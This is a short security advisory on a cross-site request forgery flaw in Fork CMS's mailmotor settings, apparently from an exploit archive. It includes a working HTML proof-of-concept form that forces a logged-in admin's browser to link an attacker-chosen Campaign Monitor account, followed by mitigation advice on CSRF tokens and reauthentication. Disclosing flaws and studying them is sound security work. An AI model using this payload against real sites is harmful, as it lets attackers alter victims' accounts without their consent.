Fork CMS Cross Site Request Forgery

`====================================================================================  
  
Fork-CMS CSRF:  
  
Introduction  
  
Author: Rafay Baloch  
  
CSRF OR XSRF (Cross site request forgery) occurs when the victim forces  
your browser to send a forged request and makes  
  
the victim performing a particular action. Any form missing with CSRF  
tokens is vulnerable to it.  
  
Impact:  
  
An attacker can accomplish multiple things, he could change the victims  
form details etc.  
  
  
PROOF OF CONCEPT:  
  
The above two forms are misssing with CSRF tokens:  
  
  
The form is missing with CSRF tokens which means that an attacker can force  
a user to link to a campaign monitor account.  
  
http://demo.fork-cms.com/private/en/mailmotor/settings?token=true#tabSettingsAccount  
  
POC:  
  
<html>  
  
<body>  
<form action="http://demo.fork-cms.com/backend/ajax.php" method="POST">  
<input type="hidden" name="fork[module]" value="mailmotor" />  
<input type="hidden" name="fork[action]"  
value="link_account" />  
<input type="hidden" name="fork[language]" value="en" />  
<input type="hidden" name="url" value="www.google.com" />  
<input type="hidden" name="username" value="rafaybaloch" />  
<input type="hidden" name="password" value="" />  
<input type="submit" value="Submit form" />  
</form>  
</body>  
</html>  
  
http://demo.fork-cms.com/private/en/settings/email  
http://demo.fork-cms.com/backend/ajax.php  
  
Mitigations:  
  
- Reauthenticate the user, if he performs an important action upon his  
account, e.g delete a user, delete himselves etc.  
- Add a CSRF token to each and every request and make sure that it is  
validated upon the server.  
  
`